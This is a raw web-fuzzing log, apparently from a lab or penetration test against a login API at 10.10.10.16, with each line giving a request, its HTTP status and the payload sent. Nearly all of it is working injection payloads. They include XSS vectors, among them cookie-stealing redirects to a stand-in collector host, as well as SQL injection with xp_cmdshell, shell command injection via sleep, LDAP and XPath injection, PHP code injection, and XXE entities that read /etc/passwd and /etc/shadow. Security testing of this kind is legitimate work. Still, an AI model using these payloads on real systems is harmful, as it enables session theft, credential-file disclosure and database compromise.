00240:  0.051s   C=00240:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X0003c"
00242:  0.052s   C=00242:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X000003c"
00241:  0.052s   C=00241:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X00003c"
00244:  0.052s   C=00244:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X03c;"
00238:  0.052s   C=00238:  C=400      0 L	       2 W	     21 Ch                                                                              "&#X03c"
00287:  0.057s   C=00287:  C=200      0 L	       2 W	     21 Ch                                                                              "">xxx<P>yyy"
00301:  0.053s   C=00301:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG%20SRC='javascript:alert(document.cookie)'>"
00293:  0.055s   C=00293:  C=200      0 L	       2 W	     21 Ch                                                                              "'><script>alert(document.cookie);</script>"
00317:  0.051s   C=00317:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG LOWSRC="javascript:alert('XSS')">"
00289:  0.055s   C=00289:  C=200      0 L	       2 W	     21 Ch                                                                              "<script>alert("XSS")</script>"
00318:  0.051s   C=00318:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
00321:  0.052s   C=00321:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
00319:  0.051s   C=00319:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
00320:  0.051s   C=00320:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"
00316:  0.051s   C=00316:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG DYNSRC="javascript:alert('XSS')">"
00311:  0.050s   C=00311:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="jav	ascript:alert('XSS');">"
00313:  0.050s   C=00313:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="jav&#x0A;ascript:alert('XSS');">"
00315:  0.051s   C=00315:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=" &#14;  javascript:alert('XSS');">"
00312:  0.050s   C=00312:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="jav&#x09;ascript:alert('XSS');">"
00314:  0.051s   C=00314:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="jav&#x0D;ascript:alert('XSS');">"
00310:  0.049s   C=00310:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG%20SRC='javasc	ript:alert(document.cookie)'>"
00307:  0.050s   C=00307:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=`javascript:alert("'XSS'")`>"
00309:  0.049s   C=00309:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"
00306:  0.050s   C=00306:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=javascript:alert(&quot;XSS&quot;)>"
00308:  0.049s   C=00308:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">"
00305:  0.051s   C=00305:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=JaVaScRiPt:alert('XSS')>"
00300:  0.050s   C=00300:  C=200      0 L	       2 W	     21 Ch                                                                              "<xss><script>alert('XSS')</script></vulnerable>"
00303:  0.050s   C=00303:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="javascript:alert('XSS')""
00302:  0.050s   C=00302:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC="javascript:alert('XSS');">"
00304:  0.051s   C=00304:  C=200      0 L	       2 W	     21 Ch                                                                              "<IMG SRC=javascript:alert('XSS')>"
00298:  0.050s   C=00298:  C=400      0 L	       2 W	     21 Ch                                                                              "&ltscript&gtalert(document.cookie);</script>"
00295:  0.050s   C=00295:  C=200      0 L	       2 W	     21 Ch                                                                              "%3cscript%3ealert("XSS");%3c/script%3e"
00299:  0.050s   C=00299:  C=400      0 L	       2 W	     21 Ch                                                                              "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
00297:  0.050s   C=00297:  C=200      0 L	       2 W	     21 Ch                                                                              "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
00296:  0.051s   C=00296:  C=200      0 L	       2 W	     21 Ch                                                                              "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
00292:  0.052s   C=00292:  C=200      0 L	       2 W	     21 Ch                                                                              "'><script>alert(document.cookie)</script>"
00294:  0.052s   C=00294:  C=200      0 L	       2 W	     21 Ch                                                                              "\";alert('XSS');//"
00288:  0.052s   C=00288:  C=200      0 L	       2 W	     21 Ch                                                                              ""><script>""
00291:  0.052s   C=00291:  C=200      0 L	       2 W	     21 Ch                                                                              "<script>alert(document.cookie)</script>"
00322:  0.052s   C=00322:  C=200      0 L	       2 W	     21 Ch                                                                              "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
00336:  0.052s   C=00336:  C=200      0 L	       2 W	     21 Ch                                                                              "= '"
00290:  0.053s   C=00290:  C=200      0 L	       2 W	     21 Ch                                                                              "<<script>alert("XSS");//<</script>"
00324:  0.052s   C=00324:  C=200      0 L	       2 W	     21 Ch                                                                              "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
00352:  0.050s   C=00352:  C=200      0 L	       2 W	     21 Ch                                                                              "0 or 1=1"
00328:  0.052s   C=00328:  C=200      0 L	       2 W	     21 Ch                                                                              "'"
00368:  0.054s   C=00368:  C=200      0 L	       2 W	     21 Ch                                                                              "' or a=a--"
00359:  0.052s   C=00359:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 1=1--"
00362:  0.053s   C=00362:  C=200      0 L	       2 W	     21 Ch                                                                              ""' or 1 --'""
00365:  0.052s   C=00365:  C=200      0 L	       2 W	     21 Ch                                                                              "or%201=1 --"
00366:  0.052s   C=00366:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 1=1 or ''='"
00360:  0.051s   C=00360:  C=200      0 L	       2 W	     21 Ch                                                                              "" or 1=1--"
00363:  0.051s   C=00363:  C=200      0 L	       2 W	     21 Ch                                                                              "or 1=1--"
00361:  0.051s   C=00361:  C=200      0 L	       2 W	     21 Ch                                                                              "' or '1'='1'--"
00367:  0.054s   C=00367:  C=200      0 L	       2 W	     21 Ch                                                                              "" or 1=1 or ""=""
00364:  0.053s   C=00364:  C=200      0 L	       2 W	     21 Ch                                                                              "or%201=1"
00355:  0.052s   C=00355:  C=200      0 L	       2 W	     21 Ch                                                                              "or 0=0 --"
00358:  0.053s   C=00358:  C=200      0 L	       2 W	     21 Ch                                                                              "or 0=0 #"
00351:  0.051s   C=00351:  C=200      0 L	       2 W	     21 Ch                                                                              "') or ('x'='x"
00353:  0.051s   C=00353:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 0=0 --"
00348:  0.051s   C=00348:  C=200      0 L	       2 W	     21 Ch                                                                              "' or ''='"
00357:  0.052s   C=00357:  C=200      0 L	       2 W	     21 Ch                                                                              "" or 0=0 #"
00356:  0.052s   C=00356:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 0=0 #"
00349:  0.051s   C=00349:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 'x'='x"
00350:  0.051s   C=00350:  C=200      0 L	       2 W	     21 Ch                                                                              "" or "x"="x"
00354:  0.051s   C=00354:  C=200      0 L	       2 W	     21 Ch                                                                              "" or 0=0 --"
00345:  0.050s   C=00345:  C=200      0 L	       2 W	     21 Ch                                                                              "'or select *"
00344:  0.050s   C=00344:  C=200      0 L	       2 W	     21 Ch                                                                              "\x27\x6F\x72 SELECT *"
00343:  0.050s   C=00343:  C=200      0 L	       2 W	     21 Ch                                                                              "\x27\x4F\x52 SELECT *"
00346:  0.050s   C=00346:  C=200      0 L	       2 W	     21 Ch                                                                              "admin'--"
00342:  0.050s   C=00342:  C=200      0 L	       2 W	     21 Ch                                                                              "\x3D \x27"
00347:  0.051s   C=00347:  C=400      0 L	       2 W	     21 Ch                                                                              "<>"'%;)(&+"
00341:  0.052s   C=00341:  C=200      0 L	       2 W	     21 Ch                                                                              "\x3D \x3B'"
00339:  0.052s   C=00339:  C=200      0 L	       2 W	     21 Ch                                                                              "\x23"
00340:  0.056s   C=00340:  C=200      0 L	       2 W	     21 Ch                                                                              "\x27"
00335:  0.051s   C=00335:  C=200      0 L	       2 W	     21 Ch                                                                              "' ;"
00337:  0.051s   C=00337:  C=200      0 L	       2 W	     21 Ch                                                                              "= ;"
00334:  0.050s   C=00334:  C=200      0 L	       2 W	     21 Ch                                                                              "--';"
00332:  0.051s   C=00332:  C=200      0 L	       2 W	     21 Ch                                                                              "--"
00338:  0.101s   C=00338:  C=200      0 L	       2 W	     21 Ch                                                                              "= --"
00331:  0.051s   C=00331:  C=200      0 L	       2 W	     21 Ch                                                                              "-"
00333:  0.050s   C=00333:  C=200      0 L	       2 W	     21 Ch                                                                              "' --"
00330:  0.049s   C=00330:  C=200      0 L	       2 W	     21 Ch                                                                              "#"
00327:  0.052s   C=00327:  C=400      0 L	       2 W	     21 Ch                                                                              "http://10.10.10.16/api/login"
00329:  0.049s   C=00329:  C=200      0 L	       2 W	     21 Ch                                                                              """
00325:  0.052s   C=00325:  C=200      0 L	       2 W	     21 Ch                                                                              "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
00326:  0.052s   C=00326:  C=200      0 L	       2 W	     21 Ch                                                                              "'';!--"<XSS>=&{()}"
00375:  0.052s   C=00375:  C=200      0 L	       2 W	     21 Ch                                                                              "hi' or 'a'='a"
00383:  0.052s   C=00383:  C=200      0 L	       2 W	     21 Ch                                                                              "select"
00390:  0.050s   C=00390:  C=200      0 L	       2 W	     21 Ch                                                                              "asc"
00323:  0.054s   C=00323:  C=200      0 L	       2 W	     21 Ch                                                                              ""><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>"
00369:  0.052s   C=00369:  C=200      0 L	       2 W	     21 Ch                                                                              "" or "a"="a"
00391:  0.051s   C=00391:  C=200      0 L	       2 W	     21 Ch                                                                              "desc"
00392:  0.052s   C=00392:  C=200      0 L	       2 W	     21 Ch                                                                              "delete"
00371:  0.052s   C=00371:  C=200      0 L	       2 W	     21 Ch                                                                              "") or ("a"="a"
00389:  0.051s   C=00389:  C=200      0 L	       2 W	     21 Ch                                                                              "order by"
00385:  0.050s   C=00385:  C=200      0 L	       2 W	     21 Ch                                                                              "as"
00382:  0.050s   C=00382:  C=200      0 L	       2 W	     21 Ch                                                                              "PRINT @@variable"
00380:  0.050s   C=00380:  C=200      0 L	       2 W	     21 Ch                                                                              ",@variable"
00388:  0.050s   C=00388:  C=200      0 L	       2 W	     21 Ch                                                                              "limit"
00387:  0.050s   C=00387:  C=200      0 L	       2 W	     21 Ch                                                                              "procedure"
00381:  0.050s   C=00381:  C=200      0 L	       2 W	     21 Ch                                                                              "PRINT"
00384:  0.050s   C=00384:  C=200      0 L	       2 W	     21 Ch                                                                              "insert"
00386:  0.050s   C=00386:  C=200      0 L	       2 W	     21 Ch                                                                              "or"
00393:  0.108s   C=00393:  C=200      0 L	       2 W	     21 Ch                                                                              "update"
00395:  0.108s   C=00395:  C=200      0 L	       2 W	     21 Ch                                                                              "having"
00379:  0.158s   C=00379:  C=200      0 L	       2 W	     21 Ch                                                                              "@variable"
00378:  0.109s   C=00378:  C=200      0 L	       2 W	     21 Ch                                                                              "'hi' or 'x'='x';"
00377:  0.108s   C=00377:  C=200      0 L	       2 W	     21 Ch                                                                              "hi") or ("a"="a"
00372:  0.109s   C=00372:  C=200      0 L	       2 W	     21 Ch                                                                              "hi" or "a"="a"
00373:  0.108s   C=00373:  C=200      0 L	       2 W	     21 Ch                                                                              "hi" or 1=1 --"
00374:  0.108s   C=00374:  C=200      0 L	       2 W	     21 Ch                                                                              "hi' or 1=1 --"
00370:  0.108s   C=00370:  C=200      0 L	       2 W	     21 Ch                                                                              "') or ('a'='a"
00376:  0.108s   C=00376:  C=200      0 L	       2 W	     21 Ch                                                                              "hi') or ('a'='a"
00407:  0.049s   C=00407:  C=200      0 L	       2 W	     21 Ch                                                                              "exec sp"
00441:  0.049s   C=00441:  C=200      0 L	       2 W	     21 Ch                                                                              "%29"
00440:  0.049s   C=00440:  C=200      0 L	       2 W	     21 Ch                                                                              ")"
00437:  0.049s   C=00437:  C=200      0 L	       2 W	     21 Ch                                                                              "%2A%28%7C%28objectclass%3D%2A%29%29"
00399:  0.050s   C=00399:  C=200      0 L	       2 W	     21 Ch                                                                              "handler"
00423:  0.049s   C=00423:  C=200      0 L	       2 W	     21 Ch                                                                              "%27%20or%201=1"
00438:  0.049s   C=00438:  C=200      0 L	       2 W	     21 Ch                                                                              "("
00439:  0.049s   C=00439:  C=200      0 L	       2 W	     21 Ch                                                                              "%28"
00442:  0.049s   C=00442:  C=400      0 L	       2 W	     21 Ch                                                                              "&"
00436:  0.056s   C=00436:  C=200      0 L	       2 W	     21 Ch                                                                              "*(|(objectclass=*))"
00435:  0.050s   C=00435:  C=200      0 L	       2 W	     21 Ch                                                                              "%2A%28%7C%28mail%3D%2A%29%29"
00434:  0.050s   C=00434:  C=200      0 L	       2 W	     21 Ch                                                                              "*(|(mail=*))"
00433:  0.055s   C=00433:  C=200      0 L	       2 W	     21 Ch                                                                              "%2A%7C"
00430:  0.057s   C=00430:  C=200      0 L	       2 W	     21 Ch                                                                              "|"
00429:  0.057s   C=00429:  C=200      0 L	       2 W	     21 Ch                                                                              "(sqlattempt2)"
00432:  0.060s   C=00432:  C=200      0 L	       2 W	     21 Ch                                                                              "*|"
00431:  0.061s   C=00431:  C=200      0 L	       2 W	     21 Ch                                                                              "%7C"
00428:  0.061s   C=00428:  C=200      0 L	       2 W	     21 Ch                                                                              "'sqlattempt1"
00427:  0.061s   C=00427:  C=400      0 L	       2 W	     21 Ch                                                                              "&apos;%20OR"
00426:  0.057s   C=00426:  C=200      0 L	       2 W	     21 Ch                                                                              "char%4039%41%2b%40SELECT"
00425:  0.050s   C=00425:  C=200      0 L	       2 W	     21 Ch                                                                              "%20'sleep%2050'"
00422:  0.049s   C=00422:  C=200      0 L	       2 W	     21 Ch                                                                              "'%20or%201=1"
00424:  0.050s   C=00424:  C=200      0 L	       2 W	     21 Ch                                                                              "%20$(sleep%2050)"
00419:  0.050s   C=00419:  C=200      0 L	       2 W	     21 Ch                                                                              "to_timestamp_tz"
00420:  0.051s   C=00420:  C=200      0 L	       2 W	     21 Ch                                                                              "tz_offset"
00417:  0.049s   C=00417:  C=200      0 L	       2 W	     21 Ch                                                                              "'||UTL_HTTP.REQUEST"
00421:  0.051s   C=00421:  C=400      0 L	       2 W	     21 Ch                                                                              "&lt;&gt;&quot;'%;)(&amp;+"
00418:  0.049s   C=00418:  C=200      0 L	       2 W	     21 Ch                                                                              "1;SELECT%20*"
00416:  0.049s   C=00416:  C=200      0 L	       2 W	     21 Ch                                                                              "' (select top 1"
00415:  0.049s   C=00415:  C=200      0 L	       2 W	     21 Ch                                                                              "' or (EXISTS)"
00414:  0.049s   C=00414:  C=200      0 L	       2 W	     21 Ch                                                                              "' UNION ALL SELECT"
00413:  0.048s   C=00413:  C=200      0 L	       2 W	     21 Ch                                                                              "' UNION SELECT"
00412:  0.050s   C=00412:  C=200      0 L	       2 W	     21 Ch                                                                              "\x27UNION SELECT"
00411:  0.050s   C=00411:  C=200      0 L	       2 W	     21 Ch                                                                              "--sp_password"
00406:  0.050s   C=00406:  C=200      0 L	       2 W	     21 Ch                                                                              "exec xp"
00410:  0.050s   C=00410:  C=200      0 L	       2 W	     21 Ch                                                                              "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00408:  0.050s   C=00408:  C=200      0 L	       2 W	     21 Ch                                                                              "'; exec master..xp_cmdshell"
00409:  0.050s   C=00409:  C=200      0 L	       2 W	     21 Ch                                                                              "'; exec xp_regread"
00405:  0.050s   C=00405:  C=400      0 L	       2 W	     21 Ch                                                                              "' or user like '%"
00404:  0.050s   C=00404:  C=400      0 L	       2 W	     21 Ch                                                                              "' or uid like '%"
00403:  0.050s   C=00403:  C=400      0 L	       2 W	     21 Ch                                                                              "' or userid like '%"
00402:  0.050s   C=00402:  C=400      0 L	       2 W	     21 Ch                                                                              "' or uname like '%"
00401:  0.050s   C=00401:  C=400      0 L	       2 W	     21 Ch                                                                              "' or username like '%"
00396:  0.049s   C=00396:  C=200      0 L	       2 W	     21 Ch                                                                              "truncate"
00397:  0.049s   C=00397:  C=200      0 L	       2 W	     21 Ch                                                                              "replace"
00398:  0.050s   C=00398:  C=200      0 L	       2 W	     21 Ch                                                                              "like"
00394:  0.049s   C=00394:  C=200      0 L	       2 W	     21 Ch                                                                              "distinct"
00400:  0.049s   C=00400:  C=200      0 L	       2 W	     21 Ch                                                                              "bfilename"
00445:  0.051s   C=00445:  C=200      0 L	       2 W	     21 Ch                                                                              "%21"
00443:  0.052s   C=00443:  C=200      0 L	       2 W	     21 Ch                                                                              "%26"
00457:  0.051s   C=00457:  C=200      0 L	       2 W	     21 Ch                                                                              "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>"
00449:  0.051s   C=00449:  C=200      0 L	       2 W	     21 Ch                                                                              "/"
00456:  0.056s   C=00456:  C=200      0 L	       2 W	     21 Ch                                                                              "<name>','')); phpinfo(); exit;/*</name>"
00467:  0.051s   C=00467:  C=200      0 L	       2 W	     21 Ch                                                                              "<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00466:  0.051s   C=00466:  C=200      0 L	       2 W	     21 Ch                                                                              "<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00465:  0.051s   C=00465:  C=200      0 L	       2 W	     21 Ch                                                                              "<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
00464:  0.051s   C=00464:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>"
00468:  0.051s   C=00468:  C=200      0 L	       2 W	     21 Ch                                                                              "<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>"
00463:  0.052s   C=00463:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>"
00462:  0.051s   C=00462:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>"
00460:  0.050s   C=00460:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
00461:  0.051s   C=00461:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>"
00459:  0.050s   C=00459:  C=200      0 L	       2 W	     21 Ch                                                                              "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
00458:  0.050s   C=00458:  C=200      0 L	       2 W	     21 Ch                                                                              "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>"
00455:  0.050s   C=00455:  C=200      0 L	       2 W	     21 Ch                                                                              "x' or name()='username' or 'x'='y"
00448:  0.050s   C=00448:  C=200      0 L	       2 W	     21 Ch                                                                              "x' or 1=1 or 'x'='y"
00453:  0.050s   C=00453:  C=200      0 L	       2 W	     21 Ch                                                                              "@*"
00454:  0.050s   C=00454:  C=200      0 L	       2 W	     21 Ch                                                                              "count(/child::node())"
00452:  0.050s   C=00452:  C=200      0 L	       2 W	     21 Ch                                                                              "*/*"
00451:  0.050s   C=00451:  C=200      0 L	       2 W	     21 Ch                                                                              "//*"
00444:  0.049s   C=00444:  C=200      0 L	       2 W	     21 Ch                                                                              "!"
00450:  0.050s   C=00450:  C=200      0 L	       2 W	     21 Ch                                                                              "//"
00446:  0.057s   C=00446:  C=200      0 L	       2 W	     21 Ch                                                                              "' or 1=1 or ''='"
00447:  0.053s   C=00447:  C=200      0 L	       2 W	     21 Ch                                                                              "' or ''='"

Total time: 0
Processed Requests: 468
Filtered Requests: 0
Requests/sec.: 0
